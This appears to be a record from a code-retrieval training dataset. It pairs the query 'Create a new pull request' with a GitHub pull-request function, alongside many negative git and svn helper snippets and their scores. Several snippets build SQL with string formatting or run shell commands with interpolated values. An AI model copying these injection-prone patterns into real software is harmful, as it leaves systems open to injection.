in email and '@chromium.org' not in email\n and '@collabora.com' not in email):\n ncontact, nemail = get_contact(chromeos_path, sha)\n if ncontact:\n contact = ncontact\n email = nemail\n\n subject = elem[5].rstrip('\\n')\n\n ps = subprocess.Popen(['git', '-C', chromeos_path, 'show', sha], stdout=subprocess.PIPE)\n spid = subprocess.check_output(['git', '-C', chromeos_path, 'patch-id'],\n stdin=ps.stdout, encoding='utf-8', errors='ignore')\n patchid = spid.split(' ', 1)[0]\n\n # Make sure date is unique and in ascending order.\n date = int(committed)\n if date == prevdate:\n date = mprevdate + 1\n else:\n prevdate = date\n date = date * 1000\n mprevdate = date\n\n # Do nothing if the sha is already in the commit table.\n c.execute(\"select sha from commits where sha='%s'\" % sha)\n found = c.fetchone()\n if found:\n continue\n\n # check for cherry pick lines. If so, record the upstream SHA associated\n # with this commit. Only look for commits which may be upstream or may\n # have been merged from a stable release.\n usha = ''\n if not chromium.match(subject):\n u = upstream.match(subject)\n desc = subprocess.check_output(['git', '-C', chromeos_path, 'show', '-s', sha],\n encoding='utf-8', errors='ignore')\n for d in desc.splitlines():\n m = None\n if u:\n m = cherrypick.search(d)\n else:\n m = stable.search(d)\n if not m:\n m = stable2.search(d)\n if m:\n usha = m.group(2)[:12]\n # The patch may have been picked multiple times; only record\n # the first entry.\n break\n\n # Search for embedded Change-Id string.\n # If found, add it to database.\n desc = subprocess.check_output(['git', '-C', chromeos_path, 'show', '-s', sha],\n encoding='utf-8', errors='ignore')\n for d in desc.splitlines():\n chid = changeid.match(d)\n if chid:\n chid = chid.group(1)\n break\n\n # Initially assume we'll drop everything because it is not listed when\n # running \"rebase -i\". Before doing that, check if the commit is a\n # stable release commit. If so, mark it accordingly.\n reason = 'upstream'\n c.execute(\"select sha from stable where sha is '%s'\" % sha)\n if c.fetchone():\n reason = 'stable'\n\n q = \"\"\"\n INSERT INTO commits(date, created, updated, authored, committed, contact,\n email, sha, usha, patchid, changeid, subject,\n disposition, reason)\n VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\n \"\"\"\n c.execute(q,\n (date, NOW(), NOW(), authored, committed, contact, email,\n sha, usha, patchid, chid, subject, 'drop', reason))\n filenames = subprocess.check_output(\n ['git', '-C', chromeos_path, 'show', '--name-only', '--format=', sha],\n encoding='utf-8', errors='ignore')\n for fn in filenames.splitlines():\n if fn != '':\n c.execute('INSERT INTO files(sha, filename) VALUES (?, ?)',\n (\n sha,\n fn,\n ))\n\n conn.commit()\n\n # \"git cherry -v <target>\" on branch rebase_baseline gives us a list\n # of patches to apply.\n patches = subprocess.check_output(\n ['git', '-C', chromeos_path, 'cherry', '-v', rebase_target_tag()],\n encoding='utf-8', errors='ignore')\n for patch in patches.splitlines():\n elem = patch.split(' ', 2)\n # print(\"patch: \" + patch)\n # print(\"elem[0]: '%s' elem[1]: '%s' elem[2]: '%s'\" % (elem[0], elem[1], elem[2]))\n if elem[0] == '+':\n # patch not found upstream\n sha = elem[1][:12]\n # Try to find patch in stable branch. If it is there, drop it after all.\n # If not, we may need to apply it.\n c.execute(\"select sha, origin from stable where sha is '%s'\" % sha)\n found = c.fetchone()\n if found:\n c.execute(\n \"UPDATE commits SET disposition=('drop') where sha='%s'\" %\n sha)\n c.execute(\"UPDATE commits SET reason=('%s') where sha='%s'\" %\n (found[1], sha))\n c.execute(\"UPDATE commits SET updated=('%d') where sha='%s'\" %\n (NOW(), sha))\n else:\n # We need to check if the commit is already marked as drop\n # with a reason other than \"upstream\". If so, don't update it.\n c.execute(\n \"select disposition, reason from commits where sha='%s'\" %\n sha)\n found = c.fetchone()\n if found and found[0] == 'drop' and found[1] == 'upstream':\n c.execute(\n \"UPDATE commits SET disposition=('pick') where sha='%s'\"\n % sha)\n c.execute(\"UPDATE commits SET reason=('') where sha='%s'\" %\n sha)\n c.execute(\n \"UPDATE commits SET updated=('%d') where sha='%s'\" %\n (NOW(), sha))\n\n conn.commit()\n conn.close()", "def apply_patches(ctx, patches, branch, die_on_fail=True):\n ctx.runprocess(['git', 'checkout',\n '%s/%s' % (ctx.config['remote'], branch)])\n for patch in patches:\n print('Applying to %s: %s' % (branch, patch.subject))\n res = ctx.runprocess(\n ['git', 'am', '--3way'],\n stdin_string=''.join(patch.lines),\n check_returncode=0 if die_on_fail else None,\n )\n if not die_on_fail and res.returncode:\n raise RuntimeError(res.stderr)\n sha1 = ctx.runprocess(['git', 'rev-parse', 'HEAD']).stdout.strip()\n if ctx.verbosity:\n print('Resulting hash: %s' % sha1)\n return sha1", "def _set_tracking_branch_commit(self, branch, remote, depth):\n\n branch_output = fmt.ref_string(branch)\n origin = self._remote(remote)\n return_code = self.fetch(remote, depth=depth, ref=branch)\n if return_code != 0:\n raise ClowderGitError(msg=colored(' - Failed to fech', 'red'))\n if not self.existing_local_branch(branch):\n message = colored(' - No local branch ', 'red') + branch_output + '\\n'\n self._print(message)\n self._exit(message)\n if not self.existing_remote_branch(branch, remote):\n message = colored(' - No remote branch ', 'red') + branch_output + '\\n'\n self._print(message)\n self._exit(message)\n local_branch = self.repo.heads[branch]\n remote_branch = origin.refs[branch]\n if local_branch.commit != remote_branch.commit:\n message_1 = colored(' - Existing remote branch ', 'red')\n message_2 = colored(' on different commit', 'red')\n message = message_1 + branch_output + message_2 + '\\n'\n self._print(message)\n self._exit(message_1)\n return_code = self._set_tracking_branch(remote, branch)\n if return_code != 0:\n self._exit(colored(' - Failed to set tracking branch', 'red'))", "def checkout(branch=\"lf-dev\"):\n with cd(FOLDER):\n sudo('git fetch', user='tomcat')\n sudo('git checkout %s' % branch, user='tomcat')\n status()", "async def push(\n app: AppIdentity,\n repo: str,\n branch: str,\n sha: str,\n name: str,\n output_title: str,\n output_summary: Optional[str],\n output: Optional[str],\n):\n repo = RepoName.parse(repo)\n output = load_job_output(output_title, output_summary, output)\n\n async with aiohttp.ClientSession(\n headers=await app.installation_headers(repo.owner)) as sesh:\n\n if not sha:\n logging.info(\"Resolving branch sha: %s\", branch)\n ref_url = (\n f\"https://api.github.com\"\n f\"/repos/{repo.owner}/{repo.repo}/git/refs/heads/{branch}\"\n )\n logging.debug(ref_url)\n resp = await sesh.get(ref_url)\n logging.info(resp)\n sha = (await resp.json())[\"object\"][\"sha\"]\n\n action = checks.CreateRun(\n owner=repo.owner,\n repo=repo.repo,\n run=checks.RunDetails(\n head_branch=branch,\n head_sha=sha,\n name=name,\n status=checks.Status.in_progress,\n output = output,\n ))\n\n async with action.execute(sesh) as resp:\n logging.debug(resp)\n\n try:\n resp.raise_for_status()\n except Exception:\n logging.exception((await resp.json())[\"message\"])\n raise\n\n print(await resp.json())", "def pull(self, remote, branch, *args):\n return self.cmd('pull', remote, branch, *args)", "def update(self, co_dir):\n self.run_task(' '.join(['svn', 'up', co_dir]))\n pass", "def cmd_update(self):\n self.update_repository()\n results = self.results.getvalue()\n if results:\n print('---')\n print(results, end='')", "def validate_sha_github(sha):\n r = requests.head(github_changeset_url % sha)\n return r.status_code == 200", "def git_pull():\n\n puts(yellow(\"Pull master from GitHub\"))\n with cd(env.source_dir):\n run('git reset --hard HEAD')\n run('git pull')", "def update_last_manifest(self, manifest_sha):\n\n self.db.upsert_documents(\n {'last-manifest': {'latest_sha': manifest_sha}}\n )", "def update(self, commit, **kwargs):\n self._pkg_changes(commit=self.commit, **kwargs)\n self.commit = commit", "def update_repo(self, sign=True, verbose=False):\n self.ensure_correct_user()\n\n keyname=self.read_keyname()\n self.show(f'cd {self.repo_path}')\n os.chdir(self.repo_path)\n cmds=[\n 'apt-ftparchive packages . > Packages',\n 'gzip -c Packages > Packages.gz',\n 'apt-ftparchive release . > Release',\n ]\n for cmd in cmds:\n self.show(cmd)\n s=call(cmd, shell=True)\n if s!=0:\n print('error:', cmd, file=sys.stderr)\n return 1\n self.report('Updated Packages and Release.')\n if sign:\n s = self.sign_release(keyname)\n self.report('Updated repo:', self.repo_path)\n return s", "def bump_upstream_sources(**kwargs):\n\n # Find out current tracking branch to bump\n # the services matching the branch:\n oa_folder = kwargs['workdir'] + '/openstack-ansible'\n try:\n remote_branch = tracking_branch_name(oa_folder)\n except ValueError as verr:\n raise SystemExit(verr)\n\n LOGGER.info(\"Each file can take a while to update.\")\n prevline = {}\n reporegex = re.compile('(?P<project>.*)_git_repo: (?P<remote>.*)')\n branchregex = re.compile(('(?P<project>.*)_git_install_branch: '\n '(?P<sha>[0-9a-f]{40}) '\n '# HEAD of \"(?P<branch>.*)\" '\n 'as of .*'))\n\n update_files = glob.glob(\n \"{}/playbooks/defaults/repo_packages/*.yml\".format(oa_folder))\n\n stable_branch_skips = [\n \"openstack_testing.yml\",\n \"nova_consoles.yml\",\n ]\n\n for filename in update_files:\n if remote_branch.startswith(\"stable/\") and \\\n os.path.basename(filename) in stable_branch_skips:\n LOGGER.info(\"Skipping {} for stable branch\".format(filename))\n continue\n LOGGER.info(\"Updating {}\".format(filename))\n for line in fileinput.input(filename, inplace=True):\n rrm = reporegex.match(line)\n if rrm:\n # Extract info of repo line (previous line)\n # for branch line (current line)\n prevline['project'] = rrm.group('project')\n prevline['remote'] = rrm.group('remote')\n print(branchregex.sub(\n lambda x: bump_project_sha_with_comments(x, prevline), line)),\n\n LOGGER.info(\"All files patched !\")\n msg = (\"Update all SHAs for {next_release}\\n\\n\"\n \"This patch updates all the roles to the latest available stable \\n\"\n \"SHA's, copies the release notes from the updated roles into the \\n\"\n \"integrated repo, updates all the OpenStack Service SHA's, and \\n\"\n \"updates the appropriate python requirements pins. \\n\\n\"\n \"Depends-On: {release_changeid}\").format(\n next_release=os.environ.get('next_release', '<NEW VERSION>'),\n release_changeid=os.environ.get('release_changeid', '<TODO>'),)\n if kwargs['commit']:\n repo = Repo(oa_folder)\n repo.git.add('.')\n repo.index.commit(msg)\n click.echo(\"Commit done. Please verify before review.\")\n else:\n click.echo(\"Here is a commit message you could use:\\n\")\n click.echo(msg)", "def pull(self):\n run('git', 'pull', 'origin', 'master')", "def pull_build_project(project, branch=\"master\"):\n repo_result, pull_log = pull(project.path, app.config[\"SSH_PRIVATE\"], branch)\n if repo_result:\n newjob = create_job(project, pull_log)\n settings = abcparse(os.path.join(project.path, \"build.abc\"))\n build(newjob, project, settings[\"windows\"]) #TODO: Handle configs", "def download(repo_url, sha, working_dir):\n print 'Downloading %s ...' % (sha)\n sf_zip = os.path.join(working_dir, 'sf.gz')\n with open(sf_zip, 'wb+') as f:\n f.write(requests.get(github_api(repo_url) + '/zipball/' + sha).content)\n zip_file = ZipFile(sf_zip)\n zip_file.extractall(working_dir)\n zip_file.close()\n\n for name in zip_file.namelist():\n if name.endswith('/src/'):\n src_dir = name\n break\n\n return os.path.join(working_dir, src_dir)", "def update_directory(dir):\n print('Updating {dir}...'.format(dir=dir))\n os.chdir(dir)\n status = 1\n tries = 0\n # Keep trying to git pull until success, or until tries = 30\n while status != 0:\n status = os.system('sudo git pull')\n tries += 1\n if status != 0:\n print('Trying again. Attempt {0} out of 30.'.format(tries))\n if tries == 30:\n break\n if status == 0:\n print('Succeeded.')\n else:\n print('Failed after 30 tries.')", "def update():\n require('PROJECT_NAME')\n\n with cd(utils.home('apps', env.PROJECT_NAME)):\n run('hg pull')\n run('hg up')", "def _make_release_branch(self):\n user = getpass.getuser()\n if not user == self._user:\n raise Error('the command should only be run as user %s' % self._user)\n branch = self._branch\n # get the latest master updates\n subprocess.check_call('git remote update', shell=True)\n subprocess.check_call('git checkout master', shell=True)\n # does a git pull and updates the submodules\n GitUtil.update_submodules()\n # get the latest commit before the release is cut\n self._latest_commit = GitUtil.get_latest_commit()\n print 'Making release branch %s' % branch\n # create the new release branch\n GitUtil.create_branch(branch)\n print TermColor.ColorStr('Created remote branch %s' % branch, 'GREEN')", "def update():\n siteconfig = configparser.RawConfigParser()\n siteconfig.readfp(open(\"/etc/gitzillarc\"))\n sRepo = os.getcwd()\n\n logger = get_logger(siteconfig)\n oBugRegex = get_bug_regex(siteconfig)\n sRefPrefix = get_or_default(siteconfig, sRepo, \"git_ref_prefix\")\n sSeparator = get_or_default(siteconfig, sRepo, \"separator\")\n\n bRequireBugNumber = to_bool(get_or_default(siteconfig, sRepo, \"require_bug_ref\", True))\n asAllowedStatuses = None\n if has_option_or_default(siteconfig, sRepo, \"allowed_bug_states\"):\n asAllowedStatuses = [x.strip() for x in get_or_default(siteconfig, sRepo, \"allowed_bug_states\").split(\",\")]\n\n # and the bugzilla info.\n userconfig = configparser.RawConfigParser()\n userconfig.read(os.path.expanduser(\"~/.gitzillarc\"))\n (sBZUrl, sBZUser, sBZPasswd) = get_bz_data(siteconfig, userconfig)\n\n gitzilla.hooks.update(oBugRegex, asAllowedStatuses, sSeparator, sBZUrl,\n sBZUser, sBZPasswd, logger, None, sRefPrefix,\n bRequireBugNumber)", "def bump_upstream_repos_shas():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--path\",\n help=\"path to the folder containing YAML files to update with new SHAs\",\n default=\"playbooks/defaults/repo_packages/\",\n )\n args = parser.parse_args()\n\n releasing.bump_upstream_repos_shas(args.path)", "def _switchBranch(self, release):\n if release is None:\n self.branch = None\n self.branch_dir = None\n log.info('No release branch available')\n else:\n self.wc.update()\n assert self.wc.exists('branches/' + release)\n io.linesToFile(self.path(self.BRANCH_FILE), [release])\n self.branch = release\n self.branch_dir = 'branches/' + release\n self.wc.update(self.branch_dir, depth='infinity')\n log.info('Working on branch ' + self.branch)", "def generate_patch_files(sha_list: List[str], start_version: int) -> PatchList:\n upstream_dir = paths.TOOLCHAIN_LLVM_PATH\n fetch_upstream_once()\n result = PatchList()\n for sha in sha_list:\n if len(sha) < 40:\n sha = get_full_sha(upstream_dir, sha)\n file_path = paths.SCRIPTS_DIR / 'patches' / 'cherry' / f'{sha}.patch'\n assert not file_path.exists(), f'{file_path} already exists'\n with open(file_path, 'w') as fh:\n check_call(f'git format-patch -1 {sha} --stdout',\n stdout=fh, shell=True, cwd=upstream_dir)\n\n commit_subject = check_output(\n f'git log -n1 --format=%s {sha}', shell=True, cwd=upstream_dir)\n comment = '[UPSTREAM] ' + commit_subject.strip()\n rel_patch_path = f'cherry/{sha}.patch'\n end_version = sha_to_revision(sha)\n result.append(PatchItem(comment, rel_patch_path, start_version, end_version))\n return result", "def brew_update():\n subprocess.run([\"brew\", \"update\"], check=True, capture_output=True)", "def pull_svn_rev(log_entry, svn_url, target_url, svn_path, original_wc, keep_author=False):\r\n svn_rev = log_entry['revision']\r\n run_svn([\"up\", \"--ignore-externals\", \"-r\", svn_rev, original_wc])\r\n\r\n removed_paths = []\r\n merged_paths = []\r\n unrelated_paths = []\r\n commit_paths = []\r\n for d in log_entry['changed_paths']:\r\n # e.g. u'/branches/xmpp/twisted/words/test/test.py'\r\n p = d['path']\r\n if not p.startswith(svn_path + \"/\"):\r\n # Ignore changed files that are not part of this subdir\r\n if p != svn_path:\r\n unrelated_paths.append(p)\r\n continue\r\n # e.g. u'twisted/words/test/test.py'\r\n p = p[len(svn_path):].strip(\"/\")\r\n # Record for commit\r\n action = d['action']\r\n if action not in 'MARD':\r\n display_error(\"In SVN rev. %d: action '%s' not supported. \\\r\n Please report a bug!\" % (svn_rev, action))\r\n \r\n if len (commit_paths) < 100:\r\n commit_paths.append(p)\r\n # Detect special cases\r\n old_p = d['copyfrom_path']\r\n if old_p and old_p.startswith(svn_path + \"/\"):\r\n old_p = old_p[len(svn_path):].strip(\"/\")\r\n # Both paths can be identical if copied from an old rev.\r\n # We treat like it a normal change.\r\n if old_p != p:\r\n if not os.path.exists(p + os.sep + '.svn'):\r\n svn_add_dir(os.path.dirname(p))\r\n run_svn([\"up\", old_p])\r\n run_svn([\"copy\", old_p, p])\r\n if os.path.isfile(p):\r\n shutil.copy(original_wc + os.sep + p, p)\r\n if action == 'R':\r\n removed_paths.append(old_p)\r\n if len (commit_paths) < 100:\r\n commit_paths.append(old_p)\r\n continue\r\n if action == 'A':\r\n if os.path.isdir(original_wc + os.sep + p):\r\n svn_add_dir(p)\r\n else:\r\n p_path = os.path.dirname(p).strip() or '.'\r\n svn_add_dir(p_path)\r\n shutil.copy(original_wc + os.sep + p, p)\r\n run_svn([\"add\", p])\r\n elif action == 'D':\r\n removed_paths.append(p)\r\n else: # action == 'M'\r\n merged_paths.append(p)\r\n\r\n if removed_paths:\r\n for r in removed_paths:\r\n run_svn([\"up\", r])\r\n run_svn([\"remove\", \"--force\", r])\r\n\r\n if merged_paths:\r\n for m in merged_paths:\r\n run_svn([\"up\", m])\r\n m_url = svn_url + \"/\" + m\r\n out = run_svn([\"merge\", \"-c\", str(svn_rev), \"--non-recursive\",\r\n m_url+\"@\"+str(svn_rev), m])\r\n # if conflicts, use the copy from original_wc\r\n if out and out.split()[0] == 'C':\r\n print \"\\n### Conflicts ignored: %s, in revision: %s\\n\" \\\r\n % (m, svn_rev)\r\n run_svn([\"revert\", \"--recursive\", m])\r\n if os.path.isfile(m):\r\n shutil.copy(original_wc + os.sep + m, m)\r\n\r\n if unrelated_paths:\r\n print \"Unrelated paths: \"\r\n print \"*\", unrelated_paths\r\n\r\n ## too many files\r\n if len (commit_paths) > 99:\r\n commit_paths = []\r\n\r\n try:\r\n commit_from_svn_log_entry(log_entry, commit_paths, \r\n keep_author=keep_author)\r\n except ExternalCommandFailed:\r\n # try to ignore the Properties conflicts on files and dirs\r\n # use the copy from original_wc\r\n has_Conflict = False\r\n for d in log_entry['changed_paths']:\r\n p = d['path']\r\n p = p[len(svn_path):].strip(\"/\")\r\n if os.path.isfile(p):\r\n if os.path.isfile(p + \".prej\"):\r\n has_Conflict = True\r\n shutil.copy(original_wc + os.sep + p, p)\r\n p2=os.sep + p.replace('_', '__').replace('/', '_') \\\r\n + \".prej-\" + str(svn_rev)\r\n shutil.move(p + \".prej\", os.path.dirname(original_wc) + p2)\r\n w=\"\\n### Properties conflicts ignored:\"\r\n print \"%s %s, in revision: %s\\n\" % (w, p, svn_rev)\r\n elif os.path.isdir(p):\r\n if os.path.isfile(p + os.sep + \"dir_conflicts.prej\"):\r\n has_Conflict = True\r\n p2=os.sep + p.replace('_', '__').replace('/', '_') \\\r\n + \"_dir__conflicts.prej-\" + str(svn_rev)\r\n shutil.move(p + os.sep + \"dir_conflicts.prej\",\r\n os.path.dirname(original_wc) + p2)\r\n w=\"\\n### Properties conflicts ignored:\"\r\n print \"%s %s, in revision: %s\\n\" % (w, p, svn_rev)\r\n out = run_svn([\"propget\", \"svn:ignore\",\r\n original_wc + os.sep + p])\r\n if out:\r\n run_svn([\"propset\", \"svn:ignore\", out.strip(), p])\r\n out = run_svn([\"propget\", \"svn:externel\",\r\n original_wc + os.sep + p])\r\n if out:\r\n run_svn([\"propset\", \"svn:external\", out.strip(), p])\r\n # try again\r\n if has_Conflict:\r\n commit_from_svn_log_entry(log_entry, commit_paths,\r\n keep_author=keep_author)\r\n else:\r\n raise ExternalCommandFailed", "def update_branch_for_legalcode(self, repo, legalcode, branch_object):\n resource_slug = legalcode.license.resource_slug\n self.say(2, f\"\\tUpdating {resource_slug} {legalcode.language_code}\")\n last_tx_update = iso8601.parse_date(\n self.stats[resource_slug][legalcode.language_code][\"translated\"][\n \"last_activity\"\n ]\n )\n legalcode.translation_last_update = last_tx_update\n\n branch_object.legalcodes.add(legalcode)\n if (\n branch_object.last_transifex_update is None\n or branch_object.last_transifex_update < last_tx_update\n ):\n branch_object.last_transifex_update = last_tx_update\n\n # Get the updated translation. We don't write it to a file yet.\n # We'll do all the updates for a branch at once in the next section.\n pofile_path = legalcode.translation_filename()\n pofile_content = self.transifex_get_pofile_content(\n resource_slug, legalcode.language_code\n )\n filenames = save_content_as_pofile_and_mofile(\n pofile_path, pofile_content\n )\n relpaths = [\n os.path.relpath(\n filename, settings.TRANSLATION_REPOSITORY_DIRECTORY\n )\n for filename in filenames\n ]\n repo.index.add(relpaths)", "def set_version(ctx, branch, value):\n\n try:\n\n gh = ctx.obj.github\n\n log.echo('Setting version...', break_line=False)\n bump = gh.set_version(branch=branch, value=value)\n log.checkmark()\n log.echo('Version is now {} (was {})'.format(bump.next_version, bump.prev_version))\n return bump\n except BaseException as _:\n log.xmark()\n raise", "def test_branch_commit_set(repository: Repository) -> None:\n head, heads = repository.head, repository.heads\n heads[\"branch\"] = head.commit\n updatefile(repository.path / \"a\")\n branch = repository.branch(\"branch\")\n branch.commit = head.commit\n assert head.commit == branch.commit", "def update_source():\n\n require('environment', provided_by=env.environments)\n with cd(env.code_root):\n sudo('git pull', user=env.deploy_user)\n sudo('git checkout %(branch)s' % env, user=env.deploy_user)", "def _fetch(self, sha: str) -> None:\n # have multiple threads downloading in parallel\n queue = [sha]\n pending: Set[str] = set()\n downloaded: Set[str] = set()\n input_queue: \"Queue[Union[str, Poison]]\" = Queue() # requesting downloads\n output_queue: \"Queue[Union[str, Poison]]\" = Queue() # completed downloads\n procs = []\n for _ in range(self._processes):\n target = Binder(self, \"_download\")\n args = (input_queue, output_queue)\n # use multiprocessing.dummy to use threads instead of processes\n proc = multiprocessing.dummy.Process(target=target, args=args)\n proc.daemon = True\n proc.start()\n procs.append(proc)\n self._trace(\"\", level=Level.INFO, exact=True) # for showing progress\n done = total = 0\n while queue or pending:\n if queue:\n # if possible, queue up download\n sha = queue.pop()\n if sha in downloaded or sha in pending:\n continue\n if git.object_exists(sha):\n if sha == git.EMPTY_TREE_HASH:\n # git.object_exists() returns True for the empty\n # tree hash even if it's not present in the object\n # store. Everything will work fine in this situation,\n # but `git fsck` will complain if it's not present, so\n # we explicitly add it to avoid that.\n git.write_object(\"tree\", b\"\")\n if not git.history_exists(sha):\n # this can only happen in the case of aborted fetches\n # that are resumed later\n self._trace(\"missing part of history from %s\" % sha)\n queue.extend(git.referenced_objects(sha))\n else:\n self._trace(\"%s already downloaded\" % sha)\n else:\n pending.add(sha)\n input_queue.put(sha)\n else:\n # process completed download\n res = output_queue.get()\n if isinstance(res, Poison):\n # _download never puts Poison with an empty message in the output_queue\n assert res.message is not None\n self._fatal(res.message)\n pending.remove(res)\n downloaded.add(res)\n queue.extend(git.referenced_objects(res))\n # show progress\n done = len(downloaded)\n total = done + len(pending)\n pct = int(float(done) / total * 100)\n message = \"\\rReceiving objects: {:3.0f}% ({}/{})\".format(pct, done, total)\n self._trace(message, level=Level.INFO, exact=True)\n if total:\n self._trace(\n \"\\rReceiving objects: 100% ({}/{}), done.\\n\".format(done, total),\n level=Level.INFO,\n exact=True,\n )\n for proc in procs:\n input_queue.put(Poison())\n for proc in procs:\n proc.join()", "def merge(self, branch):\n\n if branch.username != self.username or branch.reponame != self.reponame:\n raise BranchError(\"Branch to merge must be in the same repository\")\n\n context = {\n \"username\": self.username,\n \"reponame\": self.reponame,\n \"name\": self.name\n }\n LOG.debug(\"Merging from %r to %r\" % (branch, self))\n self._client.postjson(path=\"/users/%(username)s/repos/%(reponame)s/\"\n \"branches/%(name)s/merge\" % context,\n payload={\"from_branch\": branch.name})", "def checkout(location, rev):\n ensure_dir(location)\n\n logger = utils.get_logger()\n\n with utils.cd(location):\n logger.debug(\n 'Checking out rev: {} at location: {}'.format(rev, location))\n cmd = '/usr/bin/git checkout --force --quiet {}'.format(rev)\n subprocess.check_call(cmd, shell=True)", "def push_updates():\n check_call(['git', 'push', '--tags', '--force'])", "def gitCheckoutBranch(self, path, branch):\r\n\r\n with workInDirectory(path):\r\n fetch_cmd = [\"git\", \"fetch\"]\r\n if self.verbose:\r\n print(\"Runing Command : {}\".format(\" \".join(fetch_cmd)))\r\n\r\n SubProcessUtility.runCommand(fetch_cmd)\r\n\r\n checkout_branch_command = [\"git\", \"checkout\", branch]\r\n if self.verbose:\r\n print(\"Running Command : {}\".format(\" \".join(checkout_branch_command)))\r\n SubProcessUtility.runCommand(checkout_branch_command)", "def get_repo_branch(self):\n # Load HEAD and find ref.\n with open('{path}HEAD'.format(path=self.workpath), 'rb') as fp:\n ref = fp.read().strip().decode().split(': ')[1]\n\n print('[+] Downloading {}'.format(ref))\n\n # Requests for head hash and save\n head_url = '{base_url}{ref}'.format(base_url=self.base_url, ref=ref)\n data = self._request(head_url).read().strip()\n\n # Save the hash inside the ref file into the target place.\n ref_path = '/'.join(ref.split('/')[:-1])\n if not os.path.exists('{path}{ref_path}'.format(path=self.workpath, ref_path=ref_path)):\n os.makedirs('{path}{ref_path}'.format(path=self.workpath, ref_path=ref_path))\n with open('{path}{ref}'.format(path=self.workpath, ref=ref), 'wb') as fp:\n fp.write(data)\n\n # After get ref->head_hash, why not share it.\n self.head_hash = data.decode()", "def pull(self, verbose=True):\n fetch_cmd = [\"git\", \"fetch\"]\n if not verbose:\n fetch_cmd.append(\"-q\")\n subprocess.call(fetch_cmd, cwd=self.path)\n checkout_cmd = [\"git\", \"checkout\", \"origin/master\", \"-B\", \"master\"]\n if not verbose:\n checkout_cmd.append(\"-q\")\n return subprocess.call(checkout_cmd, cwd=self.path)", "def git_branch(self, app, branch):\n if app == self.PROJECT_NAME:\n app_path = self.PROJECT_DIR\n else:\n raise ValueError('Unknown app')\n\n with lcd(app_path):\n self.local('git pull && git checkout %s' % branch)\n\n self.display('%s has been successfully switched to tag/branch %s.' % (app, branch), color='green')", "def svn_notify(self,event):\n # pysvn.wc_notify_action.update_completed\n if event['action'] == pysvn.wc_notify_action.update_completed:\n revision = event['revision']\n self.revision = revision", "def __gitSubmodulesUpdate(self):\n self.vcs.gitSubmoduleUpdate(self.project.getProjectPath())", "def pull(repo_path, ssh, branch=\"master\"):\n ssh_key = os.path.abspath(ssh)\n if platform.system() == \"Windows\":\n ssh_key = \"/\" + ssh_key.replace(\"\\\\\", \"/\").replace(\":\", \"\")\n ssh_cmd = \"ssh -i %s\" % ssh_key\n\n my_repo = git.Repo(repo_path)\n\n pull_output = \"\"\n contributer_emails = list()\n files = list()\n new_commit = False\n\n with my_repo.git.custom_environment(GIT_SSH_COMMAND=ssh_cmd):\n for result in my_repo.remotes.origin.pull(branch):\n if result.commit == my_repo.head.commit:\n continue\n new_commit = True\n contributer_emails.append(result.commit.author.email)\n pull_output += str(result.commit) + \"\\n\"\n pull_output += str(result.commit.author) + \"<\" + str(result.commit.author.email) + \">\\n\"\n pull_output += str(result.commit.committed_datetime) + \"\\n\"\n pull_output += str(result.commit.summary) + \"\\n\"\n pull_output += str(result.commit.stats.total) + \"\\n\\n\"\n\n for stat in result.commit.stats.files: #We write all files at the end of the description\n files.append(stat)\n\n if not new_commit:\n # There were no new changes, we do not need to rebuild.\n return False, \"No new changes\"\n\n pull_output += \"Files changed:\\n\"\n for changes in files:\n pull_output += changes\n\n return True, pull_output", "def validate_commit(ctx, sha, **_):\n\n gh = ctx.obj.github\n ci_provider = ctx.obj.ci_provider\n\n sha = sha or (ci_provider.sha if ci_provider else None)\n\n def _pre_issue():\n log.echo('Commit references an issue...', break_line=False)\n\n def _post_issue():\n log.checkmark()\n\n def _pre_label():\n log.echo('Issue is labeled with a release label...', break_line=False)\n\n def _post_label():\n log.checkmark()\n\n log.echo('Validating commit', add=True)\n\n try:\n gh.validate_commit(sha=sha,\n hooks={\n 'pre_issue': _pre_issue,\n 'pre_label': _pre_label,\n 'post_issue': _post_issue,\n 'post_label': _post_label\n })\n except exceptions.ReleaseValidationFailedException as e:\n log.xmark()\n log.sub()\n tb = sys.exc_info()[2]\n utils.raise_with_traceback(e, tb)\n log.sub()\n\n log.echo('Validation passed')", "def update(ID, **updates):\n # Filter out any None values.\n review_updates = {k:v for k,v in updates.items() if v}\n\n if len(review_updates) > 0:\n data = json_encode(review_updates)\n gh_request('POST', '/repos/:user/:repo/pulls/:id', uri_vars={'id': ID}, body=data)\n printers.print_review_updated()", "def create_branch(ctx, name, sha):\n\n try:\n\n gh = ctx.obj.github\n\n log.echo('Creating branch...', break_line=False)\n branch = gh.create_branch(name=name, sha=sha)\n log.checkmark()\n log.echo('Branch {} created at {}'.format(name, sha))\n return branch\n except BaseException as _:\n log.xmark()\n raise" ]
[ "0.62394434", "0.62033707", "0.58707505", "0.5823983", "0.57316476", "0.5548735", "0.54924744", "0.5490744", "0.54566896", "0.53568214", "0.533697", "0.53313905", "0.5318119", "0.5305053", "0.52909243", "0.52125496", "0.5172792", "0.51444185", "0.5125727", "0.5123589", "0.5117004", "0.51135176", "0.5107081", "0.50763315", "0.5057646", "0.5046271", "0.5030426", "0.50106573", "0.49981362", "0.49795562", "0.49613053", "0.49552605", "0.49242672", "0.49159274", "0.4906212", "0.4887669", "0.48787075", "0.48440373", "0.48430702", "0.4826631", "0.4822493", "0.4813265", "0.4785168", "0.47659603", "0.47631398", "0.4759415", "0.4755382", "0.47523403", "0.47321033", "0.4716193", "0.4681286", "0.46703753", "0.46676362", "0.4663845", "0.46367013", "0.4623172", "0.46112978", "0.4604527", "0.45972884", "0.45906225", "0.45803124", "0.4575057", "0.45698196", "0.45605144", "0.45267117", "0.4519026", "0.45127758", "0.45112032", "0.4501685", "0.44947094", "0.44882494", "0.44856942", "0.4482125", "0.44731998", "0.44712391", "0.4467855", "0.4460572", "0.44542435", "0.44469336", "0.44284788", "0.442826", "0.44260177", "0.44251585", "0.44221878", "0.4414698", "0.44058475", "0.44024023", "0.4396537", "0.43931773", "0.43900466", "0.43794128", "0.43735367", "0.43715444", "0.43610686", "0.4360904", "0.4357786", "0.43475527", "0.43448156", "0.4341328", "0.43374324" ]
0.70466286
0
Create a new pull request
def create_pull_request(self, base, head, title, body=None): pull_info = { 'title': title, 'head': head, 'base': base } if body: pull_info['body'] = body logger.info(pull_info) resp = self.post('pulls', json=pull_info) try: resp.raise_for_status() except Exception: logger.error(resp.json()) raise return resp.json()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
